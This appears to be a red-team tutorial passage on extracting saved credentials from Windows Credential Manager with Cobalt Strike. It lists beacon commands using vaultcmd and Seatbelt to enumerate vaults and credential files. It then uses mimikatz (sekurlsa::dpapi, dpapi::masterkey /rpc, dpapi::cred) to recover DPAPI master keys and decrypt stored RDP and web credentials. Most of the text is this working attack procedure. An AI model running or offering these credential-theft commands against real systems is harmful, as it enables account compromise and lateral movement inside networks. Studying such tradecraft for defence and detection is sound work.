Windows Credential Manager stores secrets in vaults; each saved credential is a DPAPI-encrypted blob written to a file under the user's profile. A vault can hold multiple credentials. There are two vaults in Windows:

  • Web Credentials: stores credentials saved by Internet Explorer and legacy Edge
  • Windows Credentials: stores credentials saved by Windows/AD (e.g. those saved by mstsc, the RDP client)

To enumerate using Cobalt Strike:

# list vaults
beacon> run vaultcmd /list # also shows each vault's GUID and on-disk location
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsVault

# list credentials in a vault
beacon> run vaultcmd /listcreds:"Windows Credentials" /all

# enumerate credential files (also shows the GUID of the master key each file was encrypted with)
beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe WindowsCredentialFiles

The master key itself (located in C:\Users\<user>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>) is also encrypted, with a key derived from the user's password, so it has to be decrypted before any credential file that references it can be.

To decrypt the master key:

# if elevated: dump master keys cached by LSASS (only present for users who have used DPAPI since logon)
# the ! prefix runs mimikatz as SYSTEM
beacon> mimikatz !sekurlsa::dpapi

# or, running as the owner of the master key, ask the DC to decrypt it with the domain backup key (/rpc):
beacon> mimikatz dpapi::masterkey /in:C:\Users\bfarmer\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

# ^ if Beacon is impersonating the user (e.g. steal_token / make_token), use the @ prefix so mimikatz runs with that token

Then decrypt the credential blob, passing the decrypted master key (the hex string printed by the previous step):

beacon> mimikatz dpapi::cred /in:C:\Users\bfarmer\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214